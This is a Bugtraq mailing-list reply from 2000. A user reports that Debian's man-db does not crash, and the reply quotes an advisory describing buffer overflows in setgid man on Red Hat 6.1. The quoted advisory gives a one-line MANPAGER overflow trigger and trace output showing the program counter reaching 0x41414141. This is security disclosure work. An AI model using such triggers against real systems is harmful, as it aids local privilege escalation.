[14075] in bugtraq
Re: man bugs might lead to root compromise (RH 6.1 and other boxe
daemon@ATHENA.MIT.EDU (Licquia, Jeff)
Mon Feb 28 16:21:12 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="ISO-8859-2"
Message-Id: <B354AE82055CD311854A00902779138F1005@sc-data.springfieldclinic.com>
Date: Mon, 28 Feb 2000 09:48:55 -0600
Reply-To: "Licquia, Jeff" <JLicquia@SPRINGFIELDCLINIC.COM>
From: "Licquia, Jeff" <JLicquia@SPRINGFIELDCLINIC.COM>
X-To: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
Tested on Debian potato. No SIGSEGV.
Package status for man on my box:
Desired=Unknown/Install/Remove/Purge
| Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed
|/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err:
uppercase=bad)
||/ Name Version Description
+++-==============-==============-==========================================
==
ii man-db 2.3.10-69s Display the on-line manual.
-----Original Message-----
From: Michal Zalewski [mailto:lcamtuf@DIONE.IDS.PL]
Sent: Saturday, February 26, 1994 6:49 AM
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: man bugs might lead to root compromise (RH 6.1 and other boxes)
With most of Linux distributions, /usr/bin/man is shipped as setgid man.
This setgid bit is required to build formatted manpages in /var/catman for
faster access. Unfortunately, man does almost everything via system()
calls, where parameters are user-dependent, and almost always it's
sprintf'ed before to fixed size buffers. It's kinda trivial to gain man
privledges, using buffer overflows in enviromental variables. For example,
by specyfing MANPAGER variable with approx 4k 'A' letters, you'll get
SEGV:
$ MANPAGER=`perl -e '{print "A"x4000}'` man ls
[...]
1200 setuid(500) = 0
1200 setgid(15) = 0
1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file
or directory)
1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No
such file or directory)1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1
ENOENT (No such file or directory)
1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No
such file or directory)1200 close(-1) = -1 EBADF
(Bad file descriptor)
1200 write(2, "Error executing formatting or display command.\nSystem
command (cd /usr/man ; (echo
1200 --- SIGSEGV (Naruszenie ochrony pamiêci) ---
1200 +++ killed by SIGSEGV +++
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
[...]
